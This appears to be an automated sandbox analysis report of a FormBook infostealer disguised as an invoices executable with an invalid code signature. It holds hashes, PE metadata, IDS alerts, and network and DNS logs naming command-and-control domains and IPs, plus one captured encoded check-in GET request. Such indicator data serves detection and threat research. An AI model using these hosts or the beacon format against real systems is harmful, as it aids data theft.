                                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Entropy (8bit):7.928031153635638
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:HYCO_Invoices MS2 & MS3.exe
                                                                                                                                      File size:734'216 bytes
                                                                                                                                      MD5:96fe3d00e8b2ba36dfb240a004ab28e1
                                                                                                                                      SHA1:757169009af1210acab01e9a2385e5cca4b94f20
                                                                                                                                      SHA256:57b81292b61a36171a2ad822d255aae878a8f9ca187efb43da94c7865c8388c4
                                                                                                                                      SHA512:d104d155837bcff0125d120ff9002cfbab3dc00839359e249f97ed4a78849da8ce0ab59ca084397fbb3193526a9d535d9986c49bee8e914f0dda0ec42f1c72c1
                                                                                                                                      SSDEEP:12288:j+NKG40wYjR2HI7OZGiOp+epbysKCRePsDl2h4TJEAvmxUP5kR:j+LXMH4OZGiiV9RWsJ2h4TOfxqk
                                                                                                                                      TLSH:49F4124877FC5AA0D8EA0F3650B4AA11873DBC126C13FB6D6CD060AF5DB2BD64B405A7
                                                                                                                                      Icon Hash:1d55909890818585
                                                                                                                                      Entrypoint:0x4ad506
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x661ECB73 [Tue Apr 16 19:03:15 2024 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                      Signature Valid:false
                                                                                                                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                      Error Number:-2146869232
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                                                      Subject Chain
                                                                                                                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                                      Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                                                      Instruction
                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                      inc esp
                                                                                                                                      cmp byte ptr [ebx+38h], al
                                                                                                                                      inc ebx
                                                                                                                                      aaa
                                                                                                                                      dec eax
                                                                                                                                      xor al, 33h
                                                                                                                                      aaa
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      aaa
                                                                                                                                      xor al, 38h
                                                                                                                                      inc esp
                                                                                                                                      inc ecx
                                                                                                                                      aaa
                                                                                                                                      add byte ptr [eax], al
                                                                                                                                      cmp byte ptr [eax], bh
                                                                                                                                      push ebx
                                                                                                                                      dec eax
                                                                                                                                      inc ebp
                                                                                                                                      inc esi
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xad4b4 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x42b4 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xafe00 | 0x3608 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb4000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x2000 | 0xab52c | 0xab600 | 0c2b248282e2f1fe0c893f854e79278a | False | 0.9550410854303428 | data | 7.956113865860276 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xae000 | 0x42b4 | 0x4400 | 494b68891bf97d9cfff4f88d3394dd15 | False | 0.3323184742647059 | data | 5.194376730660157 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xb4000 | 0xc | 0x200 | 8b22555a2f535c8b0a47c2ac9a15bb65 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0xae2f8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 128 | | | 0.5032894736842105 |
| RT_ICON | 0xae428 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 64 | | | 0.4943181818181818 |
| RT_ICON | 0xae4d8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | | | 0.5497311827956989 |
| RT_ICON | 0xae7c0 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | | | 0.5614754098360656 |
| RT_ICON | 0xae9a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | | | 0.5844594594594594 |
| RT_ICON | 0xaead0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.33077617328519854 |
| RT_ICON | 0xaf378 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | | | 0.48963133640552997 |
| RT_ICON | 0xafa40 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.3468208092485549 |
| RT_ICON | 0xaffa8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.18151969981238275 |
| RT_ICON | 0xb1050 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.45614754098360655 |
| RT_ICON | 0xb19d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.49024822695035464 |
| RT_GROUP_ICON | 0xb1e40 | 0xa0 | data | | | 0.6 |
| RT_GROUP_ICON | 0xb1ee0 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0xb1ef4 | 0x3c0 | data | | | 0.45 |
| DLL | Import |
| --- | --- |
| mscoree.dll | _CorExeMain |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
| --- | --- | --- | --- | --- | --- | --- | --- |
| 04/17/24-08:39:42.561650 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.4 | 91.195.240.117 |
| 04/17/24-08:40:41.121135 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49759 | 80 | 192.168.2.4 | 178.211.137.59 |
| 04/17/24-08:39:17.162071 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49738 | 80 | 192.168.2.4 | 79.98.25.1 |
| 04/17/24-08:40:11.246310 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49751 | 80 | 192.168.2.4 | 217.76.128.34 |
| 04/17/24-08:39:56.404713 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49747 | 80 | 192.168.2.4 | 64.190.62.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                      Apr 17, 2024 08:39:42.561650038 CEST4974380192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.772665977 CEST804974391.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:42.772712946 CEST804974391.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:42.773061991 CEST4974380192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.775412083 CEST4974380192.168.2.491.195.240.117
                                                                                                                                      Apr 17, 2024 08:39:42.985905886 CEST804974391.195.240.117192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:47.974397898 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:48.185107946 CEST804974464.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:48.185415983 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:48.187171936 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:48.398648024 CEST804974464.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:48.398715019 CEST804974464.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:48.398796082 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:49.688700914 CEST4974480192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:50.706794977 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:50.917534113 CEST804974564.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:50.917866945 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:50.920397043 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:51.132538080 CEST804974564.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:51.132596016 CEST804974564.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:51.132854939 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:52.422671080 CEST4974580192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:53.442257881 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:53.653523922 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.653610945 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:53.656670094 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:53.867856026 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.867887020 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.867904902 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.868591070 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.868643045 CEST804974664.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:53.868709087 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:55.172714949 CEST4974680192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.191437006 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.402036905 CEST804974764.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:56.402249098 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.404712915 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.615792036 CEST804974764.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:56.615859985 CEST804974764.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:39:56.616126060 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.619230032 CEST4974780192.168.2.464.190.62.22
                                                                                                                                      Apr 17, 2024 08:39:56.829569101 CEST804974764.190.62.22192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.211746931 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.439372063 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.439493895 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.441390991 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.669162989 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673566103 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673609018 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673650026 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673691988 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673727989 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673764944 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673800945 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673796892 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.673796892 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.673835039 CEST8049748217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:02.673851013 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:02.673880100 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:04.494103909 CEST4974880192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.504121065 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.729444027 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.729767084 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.731841087 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.957132101 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962671995 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962727070 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962745905 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962779999 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962798119 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962820053 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962836027 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962953091 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962970972 CEST8049749217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:05.962979078 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.963071108 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:05.963071108 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:07.235204935 CEST4974980192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.253855944 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.482924938 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.483092070 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.485328913 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.714374065 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714431047 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714462042 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714492083 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714521885 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714550972 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714581966 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714612007 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.714643955 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719783068 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719821930 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719861031 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719897032 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719909906 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.719935894 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.719966888 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.719974041 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.720010042 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.720021009 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.720046043 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.720097065 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:08.720097065 CEST8049750217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:08.720164061 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:10.000710964 CEST4975080192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.019171000 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.244004965 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.244088888 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.246309996 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.471049070 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477191925 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477212906 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477241993 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477261066 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477277994 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477296114 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477313042 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477324963 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.477329969 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477355003 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:11.477417946 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.477435112 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.481708050 CEST4975180192.168.2.4217.76.128.34
                                                                                                                                      Apr 17, 2024 08:40:11.706454039 CEST8049751217.76.128.34192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.031116962 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:17.327920914 CEST804975252.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.328006983 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:17.624380112 CEST804975252.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.624408007 CEST804975252.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.624490976 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:17.625899076 CEST804975252.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:17.625956059 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:18.845427036 CEST4975280192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:19.862831116 CEST4975380192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:20.160801888 CEST804975352.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:20.160893917 CEST4975380192.168.2.452.175.38.24
                                                                                                                                      Apr 17, 2024 08:40:20.458161116 CEST804975352.175.38.24192.168.2.4
                                                                                                                                      Apr 17, 2024 08:40:20.458194971 CEST804975352.175.38.24192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 17, 2024 08:39:16.577898026 CEST | 192.168.2.4 | 1.1.1.1 | 0x5d42 | Standard query (0) | www.maxiwalls.com | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:39:34.006190062 CEST | 192.168.2.4 | 1.1.1.1 | 0x650c | Standard query (0) | www.choosejungmann.com | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:39:47.785605907 CEST | 192.168.2.4 | 1.1.1.1 | 0xd729 | Standard query (0) | www.paydayloans3.shop | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:40:01.629410982 CEST | 192.168.2.4 | 1.1.1.1 | 0xc74d | Standard query (0) | www.colchondealquiler.com | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:40:16.488426924 CEST | 192.168.2.4 | 1.1.1.1 | 0x3317 | Standard query (0) | www.www60270.xyz | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:40:31.129395008 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ab6 | Standard query (0) | www.skibinscy-finanse.pl | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:40:46.675429106 CEST | 192.168.2.4 | 1.1.1.1 | 0xe621 | Standard query (0) | www.avoshield.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 17, 2024 08:39:16.925314903 CEST | 1.1.1.1 | 192.168.2.4 | 0x5d42 | No error (0) | www.maxiwalls.com | | 79.98.25.1 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:39:34.137873888 CEST | 1.1.1.1 | 192.168.2.4 | 0x650c | No error (0) | www.choosejungmann.com | | 91.195.240.117 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:39:47.969681978 CEST | 1.1.1.1 | 192.168.2.4 | 0xd729 | No error (0) | www.paydayloans3.shop | | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:40:02.209013939 CEST | 1.1.1.1 | 192.168.2.4 | 0xc74d | No error (0) | www.colchondealquiler.com | | 217.76.128.34 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:40:17.028501034 CEST | 1.1.1.1 | 192.168.2.4 | 0x3317 | No error (0) | www.www60270.xyz | fix01.pfw.djamxtvyk.cloudland3.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 17, 2024 08:40:17.028501034 CEST | 1.1.1.1 | 192.168.2.4 | 0x3317 | No error (0) | fix01.pfw.djamxtvyk.cloudland3.com | | 52.175.38.24 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:40:31.551970005 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ab6 | No error (0) | www.skibinscy-finanse.pl | | 178.211.137.59 | A (IP address) | IN (0x0001) | false
Apr 17, 2024 08:40:46.928514957 CEST | 1.1.1.1 | 192.168.2.4 | 0xe621 | No error (0) | www.avoshield.com | | 91.195.240.117 | A (IP address) | IN (0x0001) | false
                                                                                                                                      • www.maxiwalls.com
                                                                                                                                      • www.choosejungmann.com
                                                                                                                                      • www.paydayloans3.shop
                                                                                                                                      • www.colchondealquiler.com
                                                                                                                                      • www.skibinscy-finanse.pl
                                                                                                                                      • www.avoshield.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 79.98.25.1 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe

Timestamp | Bytes transferred | Direction | Data
Apr 17, 2024 08:39:17.162070990 CEST | 468 | OUT | GET /aleu/?QbZ=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&PL=0TtPMJQHYL HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.maxiwalls.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 17, 2024 08:39:17.389969110 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Wed, 17 Apr 2024 06:39:17 GMT
Server: Apache
Cache-control: max-age=300
Vary: Accept-Encoding
Content-Length: 5662
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Užregistruotas domenas - Interneto vizija</title> </head> <body><!-- begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=24></td></tr> </table><!-- end header --><!-- begin body -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 91.195.240.117 | 80 | 2680 | C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe

